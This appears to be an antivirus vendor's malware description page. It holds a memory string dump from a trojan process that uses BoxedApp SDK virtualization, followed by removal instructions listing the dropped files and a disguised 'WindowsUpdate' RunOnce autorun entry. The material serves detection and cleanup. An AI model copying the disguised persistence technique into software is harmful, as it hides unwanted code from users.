\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll
%d-%d-%p
:\TLSSupport310D39B571B74d36B95451DD240D8758
",BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper
\rundll32.exe"
DotNetAppDomainManager.CManagedHost
BoxedAppSDK_AppDomainManager, Version=1.0.0.0, Culture=neutral, PublicKeyToken=ef07ce3257ee81c1
DotNetAppDomainManager.CAppDomainManager
.config
.manifest
",BoxedAppSDK_AttachMixedBitnessProcessHelper
Attempt to launch not executable file:
Unable to find appropriate template exe
comdlg32.dll
\dllhost.exe
hh.exe
find.exe
help.exe
winver.exe
regsvr32.exe
dllhost.exe
ntvdm.exe
tcpsvcs.exe
mpr.dll
Wadvapi32.dll
sxs.dll
Obtain a full version, purchase a license at hXXp://boxedapp.com/boxedappsdk/order.html
%s_%.8x_%.8x
%s_%.8x
boxedapp_msg_process
boxedapp_event_newmsg
boxedapp_msg_global
bxsdk64.dll
:\{9019ACD6-BC11-4308-8C49-92E0601DF38D}\temp\
\DosDevices\pipe\
\Device\NamedPipe\
\??\pipe\
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Gre_Initialize
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontMapper
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontLink
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontDpi
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Console
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony\Locations
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PreviewHandlers
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates
\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates
publicKeyToken
Software\Microsoft\Windows\CurrentVersion\SideBySide\Winners\
!"#$%&'()* ,-./0123456789:;<=>?@
3, 3, 5, 0
BoxedApp, BoxedApp SDK, BoxedApp Packer, BoxedApp.com and some others are trademarks (some of them are registered) of Virtualization Technologies Ltd.
BoxedAppSDK.dll
<BoxedAppVar:OldCmdLine>
<ExeDir>
<ExeDir>\libcurl-4.dll
!"#$%&'()* ,-./0123456789:
pthreadgc2.dll
<ExeDir>\pthreadgc2.dll
POSIX Threads for Windows LPGL
2, 9, 1, 0
pthreadGC2.DLL
hXXp://sourceware.org/pthreads-win32/
<ExeDir>\zlib1.dll
For more information visit hXXp://VVV.zlib.net/

cvtres.exe_2276_rwx_00B20000_000AE000:

.text
`.rdata
@.data
.rsrc
@.reloc
l$D9.tO
FTPSW
u$D
<p.uH
TryCreateProcessForVirtualEXE, template exe found:
CBoxedAppCore::My_NtDeleteKey, KeyHandle = 0x
CBoxedAppCore::My_NtEnumerateValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtFlushKey, KeyHandle = 0x
CBoxedAppCore::My_NtNotifyChangeKey, KeyHandle = 0x
CBoxedAppCore::My_NtQueryKey, KeyHandle =
CBoxedAppCore::My_NtQueryMultipleValueKey, KeyHandle =
CBoxedAppCore::My_NtSetInformationKey, KeyHandle = 0x
KernelBase.dll
kernel32.dll
0x%x%x
CBoxedAppCore::My_NtCreateKey, ObjectAttributes = '
CBoxedAppCore::My_NtDeleteValueKey, KeyHandle = 0x
C62E2B35-E4B3-4019-A7C4-F50AC7F78470
CBoxedAppCore::My_NtLoadKey, DestinationKeyName = '
CBoxedAppCore::My_NtQueryValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtReplaceKey, BackupHiveFileName = '
CBoxedAppCore::My_NtSetValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtUnloadKey, DestinationKeyName = '
CBoxedAppCore::My_NtRenameKey, KeyHandle =
BoxedAppSDK::CBoxedAppCore::TryCreateProcessForVirtualEXE_AnotherBitnessPart
: Can't create process of rundll32.exe, last error =
BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper
BoxedAppSDK_AttachMixedBitnessProcessHelper
BoxedAppSDK_EnumVirtualRegKeysA
BoxedAppSDK_EnumVirtualRegKeysW
BoxedAppSDK_ExecuteDotNetApplicationA
BoxedAppSDK_ExecuteDotNetApplicationW
BoxedAppSDK_DeleteVirtualRegKeyByHandle
BoxedAppSDK_DeleteVirtualRegKeyW
BoxedAppSDK_DeleteVirtualRegKeyA
BoxedAppSDK_CreateVirtualRegKeyW
BoxedAppSDK_CreateVirtualRegKeyA
{4F95F74C-9713-4181-ACDD-8A50195FBC0F}
BoxedAppSDK::CBoxedAppCore::AttachToProcess_WithProcessHelper
BoxedAppSDK::CBoxedAppCore::AttachMixedBitnessProcessHelper
CBoxedAppCore::My_NtLoadKey2, DestinationKeyName = '
CBoxedAppCore::My_NtRestoreKey, KeyHandle = 0x
CBoxedAppCore::My_NtSaveKey, KeyHandle = 0x
:\VirtualDllWithSameImport.dll
:\VirtualDllWithTls.dll
VirtualDllWithTls.dll
VirtualDllWithSameImport.dll
ole32.dll
WinExec
advapi32.dll
NtRenameKey
NtUnloadKey
NtSetValueKey
NtSetInformationKey
NtSaveKey
NtRestoreKey
NtReplaceKey
NtQueryValueKey
NtQueryMultipleValueKey
NtQueryKey
NtOpenKeyEx
NtOpenKey
NtNotifyChangeKey
NtLoadKey2
NtLoadKey
NtFlushKey
NtEnumerateValueKey
NtEnumerateKey
NtDeleteValueKey
NtDeleteKey
NtCreateKey
ntdll.dll
[BOXEDAPP][pid:%d][tid:%d][ %.2d:%.2d:%.2d.%.3d]
FILE_EXECUTE
GENERIC_EXECUTE
KEY_WOW64_64KEY
KEY_WOW64_32KEY
KEY_NOTIFY
KEY_CREATE_LINK
KEY_ENUMERATE_SUB_KEYS
KEY_CREATE_SUB_KEY
KEY_SET_VALUE
KEY_QUERY_VALUE
SECTION_MAP_EXECUTE
PAGE_EXECUTE_WRITECOPY
PAGE_EXECUTE_READWRITE
PAGE_EXECUTE_READ
PAGE_EXECUTE
STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED
STATUS_LOCAL_USER_SESSION_KEY
STATUS_NULL_LM_PASSWORD
STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE
STATUS_CARDBUS_NOT_SUPPORTED
STATUS_INVALID_PORT_ATTRIBUTES
STATUS_PORT_MESSAGE_TOO_LONG
STATUS_PORT_DISCONNECTED
STATUS_PORT_CONNECTION_REFUSED
STATUS_INVALID_PORT_HANDLE
STATUS_PORT_ALREADY_SET
STATUS_EAS_NOT_SUPPORTED
STATUS_CTL_FILE_NOT_SUPPORTED
STATUS_WRONG_PASSWORD
STATUS_ILL_FORMED_PASSWORD
STATUS_PASSWORD_RESTRICTION
STATUS_PASSWORD_EXPIRED
STATUS_FLOAT_DENORMAL_OPERAND
STATUS_FLOAT_INVALID_OPERATION
STATUS_PIPE_NOT_AVAILABLE
STATUS_INVALID_PIPE_STATE
STATUS_PIPE_BUSY
STATUS_PIPE_DISCONNECTED
STATUS_PIPE_CLOSING
STATUS_PIPE_CONNECTED
STATUS_PIPE_LISTENING
STATUS_NOT_SUPPORTED
STATUS_PIPE_EMPTY
STATUS_WRONG_PASSWORD_CORE
STATUS_PIPE_BROKEN
STATUS_DISK_OPERATION_FAILED
STATUS_KEY_DELETED
STATUS_KEY_HAS_CHILDREN
STATUS_NO_USER_SESSION_KEY
STATUS_PASSWORD_MUST_CHANGE
STATUS_PORT_UNREACHABLE
STATUS_LOGIN_TIME_RESTRICTION
STATUS_LOGIN_WKSTA_RESTRICTION
STATUS_UNSUPPORTED_COMPRESSION
STATUS_NO_USER_KEYS
STATUS_NOT_EXPORT_FORMAT
STATUS_TRANSPORT_FULL
STATUS_WMI_NOT_SUPPORTED
STATUS_SAM_NEED_BOOTKEY_PASSWORD
STATUS_SAM_NEED_BOOTKEY_FLOPPY
STATUS_STRONG_CRYPTO_NOT_SUPPORTED
STATUS_NOT_SUPPORTED_ON_SBS
STATUS_CSS_KEY_NOT_PRESENT
STATUS_CSS_KEY_NOT_ESTABLISHED
STATUS_NO_KERB_KEY
STATUS_UNSUPPORTED_PREAUTH
STATUS_PORT_NOT_SET
STATUS_INVALID_IMPORT_OF_NON_DLL
STATUS_SMARTCARD_NO_KEY_CONTAINER
STATUS_SMARTCARD_NO_CERTIFICATE
STATUS_SMARTCARD_NO_KEYSET
STATUS_SMARTCARD_CERT_REVOKED
STATUS_SMARTCARD_CERT_EXPIRED
STATUS_SXS_KEY_NOT_FOUND
STATUS_CLUSTER_JOIN_IN_PROGRESS
STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS
RegDeleteKeyExW
NtRequestWaitReplyPort
NtConnectPort
NtReplyPort
NtCompleteConnectPort
NtAcceptConnectPort
NtReplyWaitReceivePort
NtCreateWaitablePort
Imported function,
.data
.idata
It's impossible to create virtual file: parent file is virtual, but passed pBehavior is not NULL
It's impossible to create virtual file: passed pBehavior doesn't support Behavior::IVirtualFileStream
It's impossible to create virtual file: parent node is virtual, but passed pBehavior is not NULL
BoxedAppSDK::Registry::Impl::CRegistry::GetAllChildsKeys
NtEnumerateKey() returned unexpected error, status =
, RegTree::IEnumKeyNode::GetNext() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::EnumVirtualRegKeys
, RegTree::IKeyNode::EnumKeys() failed, hr =
: RegTree::IEnumKeyNode::GetNext() failed, hr =
: GetAllChildsKeys() failed, status =
BoxedAppSDK::Registry::Impl::CRegistry::NtQueryKeyInternal
: RegTree::IKeyNode::EnumKeys() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::GetFullRegKeyPath
error, IVirtualKeyHandle_GetFullPath() returned
Invalid key information class:
KeySetHandleTagsInformation is not supported for virtual handle
KeySetDebugInformation is not supported for virtual handle
KeySetVirtualizationInformation is not supported for virtual handle
KeyControlFlagsInformation is not supported for virtual handle
KeyWow64FlagsInformation is not supported for virtual handle
We still don't process NtQueryObject / ObjectBasicInformation for virtual key handles
We still don't process NtQueryObject / ObjectTypeInformation for virtual key handles
: IVirtualKeyHandle::Rename() failed, hr =
: RegTree::IKeyNode::Remove() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtRenameKeyInternal
: RegTree::IKeyNode::AddKey() failed, hr =
: result hkey =
: IVirtualKey::CreateKey() failed, hr =
: we can't create a virtual key with its own behavior under another virtual key
: Handles::CreateVirtualKeyHandle() failed, hr =
: IVirtualKey::OpenKey() failed, hr =
: RegImpl::CreateKeyOnSharedMem() failed, hr =
: GetFullRegKeyPath() failed for the hKey =
: Handles::IVirtualKeyHandle::CreateKey() failed and returned
: passed pBehavior is not NULL, but parent key is virtual, so we can't create a key
BoxedAppSDK::Registry::Impl::CRegistry::CreateVirtualRegKey
: lpSubKey: "
BoxedAppSDK::Registry::Impl::CRegistry::SearchStartingFromRealKey
: Handles::CreateVirtualKeyHandle() failed
BoxedAppSDK::Registry::Impl::CRegistry::NtCreateKeyInternal
: SearchStartingFromRealKey() failed
: RegTree::IKeyNode::FindValue() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteValueKeyInternal
: IVirtualKeyHandle::put_Value() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::GetRealKeyLastWriteTime
: NtQueryKey() failed, status =
: NtOpenKey() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::HasRealKeySubKeys
: NtEnumerateValueKey() failed when we tried to get name of the node, status =
: IKeyNode::EnumValues() failed, hr =
: Behavior::IVirtualKeyHandle::EnumKeys() failed, hr =
: Behavior::IVirtualKeyHandle::EnumValues() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateValueKeyInternal
BoxedAppSDK::Registry::Impl::CRegistry::NtOpenKeyInternal
: invalid KeyInformationClass passed:
: IVirtualKeyHandle_GetFullPath() failed, hr =
: Behavior::IEnumVirtualKey::GetNext() failed, hr =
: IVirtualKeyHandle::EnumValues() failed, hr =
: IVirtualKeyHandle::EnumKeys() failed, hr =
: IVirtualKeyHandle::get_LastWriteTime() failed, hr =
reg:NtQueryMultipleValueKey(
: IKeyNode::FindValue() failed, hr =
: IVirtualKeyHandle::get_Value() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtQueryValueKeyInternal
: IVirtualKeyHandle::get_ValueType() failed, hr =
reg:NtSetInformationKey(
RegTree::IKeyNode::RemoveValue() failed, hr
BoxedAppSDK::Registry::Impl::CRegistry::NtSetValueKeyInternal
reg:NtRenameKey(
RegTree::IEnumKeyNode::GetNext(), hr =
RegTree::IKeyNode::EnumKeys(), hr =
: IEnumVirtualKey::GetNext() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteKeyInternal
reg:NtDeleteValueKey(
: NtEnumerateKey() failed when we tried to get name of the node, status =
, Behavior::IVirtualKeyHandle::get_Prop() failed, hr =
, Behavior::IVirtualKey::OpenKey() failed, hr =
: IKeyNode::EnumKeys() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateKeyInternal
reg:NtEnumerateValueKey(
reg:NtQueryKey(
reg:NtQueryValueKey(
reg:NtSetValueKey(
reg:NtCreateKey(
reg:NtDeleteKey(
reg:NtEnumerateKey(
reg:NtOpenKey(
GetProcessHeap
GetWindowsDirectoryW
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyExW
RegDeleteKeyW
RegOpenKeyW
ADVAPI32.dll
OLEAUT32.dll
bxsdk32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\bxsdk32.pdb
`.rsrc
v2.0.50727
BoxedAppSDK_AppDomainManager.dll
System.Security
.ctor
System.Security.Policy
System.Reflection
System.Runtime.InteropServices
System.Diagnostics
System.Runtime.CompilerServices
System.Collections
System.Security.Permissions
System.IO
DllImportAttribute
shell32.dll
lpCmdLine
1.0.0.0
$87cd9ac9-2a94-4a9b-aee1-8d25d6a19f78
D:\build_area\boxedapp_src\src\BoxedAppSolution\DotNetAppDomainManager\obj\x86\Release_Full\BoxedAppSDK_AppDomainManager.pdb
mscoree.dll
BoxedAppSDKThunk32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\BoxedAppSDKThunk32.pdb
.reloc
TLSSupport32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\TLSSupport32.pdb
9 9$9(9,909
4!40484}4
:$:,:5:::{:
?#?2?9?@?
1 1$1(1,1014181
9$=(=,=0=4=8=<=@=
6 6$6(6,6064686<6@6
1"26233'4
4 40454:4
:":2:7:>;
,1014181
8 8$8(8,8
%s_%.8x_%.8x_%.8x
\KernelBase.dll
\.NETFramework\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll
\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll
%d-%d-%p
:\TLSSupport310D39B571B74d36B95451DD240D8758
",BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper
\rundll32.exe"
DotNetAppDomainManager.CManagedHost
BoxedAppSDK_AppDomainManager, Version=1.0.0.0, Culture=neutral, PublicKeyToken=ef07ce3257ee81c1
DotNetAppDomainManager.CAppDomainManager
.config
.manifest
",BoxedAppSDK_AttachMixedBitnessProcessHelper
Attempt to launch not executable file:
Unable to find appropriate template exe
comdlg32.dll
\dllhost.exe
hh.exe
find.exe
help.exe
winver.exe
regsvr32.exe
dllhost.exe
ntvdm.exe
tcpsvcs.exe
mpr.dll
Wadvapi32.dll
sxs.dll
Obtain a full version, purchase a license at hXXp://boxedapp.com/boxedappsdk/order.html
%s_%.8x_%.8x
%s_%.8x
boxedapp_msg_process
boxedapp_event_newmsg
boxedapp_msg_global
bxsdk64.dll
:\{9019ACD6-BC11-4308-8C49-92E0601DF38D}\temp\
\DosDevices\pipe\
\Device\NamedPipe\
\??\pipe\
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Gre_Initialize
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontMapper
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontLink
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontDpi
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Console
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony\Locations
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PreviewHandlers
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates
\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates
publicKeyToken
Software\Microsoft\Windows\CurrentVersion\SideBySide\Winners\
!"#$%&'()* ,-./0123456789:;<=>?@
3, 3, 5, 0
BoxedApp, BoxedApp SDK, BoxedApp Packer, BoxedApp.com and some others are trademarks (some of them are registered) of Virtualization Technologies Ltd.
BoxedAppSDK.dll

cvtres.exe_2276_rwx_10000000_00001000:

.text
`.rdata
@.reloc

cvtres.exe_2276_rwx_62480000_00001000:

.text
0`.data
.rdata
[email protected]
.edata
[email protected]
.rsrc
.reloc

cvtres.exe_2276_rwx_62E80000_00001000:

.text
P`.data
.rdata
`@.bss
.edata
[email protected]
.rsrc
.reloc


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:544
    %original file name%.exe:1772
    mscorsvw.exe:1912
    Save2pcUltimate5.3.5.exe:1120

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\Save2pcUltimate5.3.5.exe (30622 bytes)
    %Program Files%\Windows Manager\winmgr.exe (34003 bytes)
    %System%\Microsoft.com (34003 bytes)
    %Program Files%\Windows Manager\3818273 (7972 bytes)
    %System%\wbem\Logs\wbemprox.log (76 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-60BO2.tmp\_isetup\_shfoldr.dll (23 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-VL84O.tmp\Save2pcUltimate5.3.5.tmp (7386 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
    "WindowsUpdate" = "%Program Files%\Windows Manager\winmgr.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now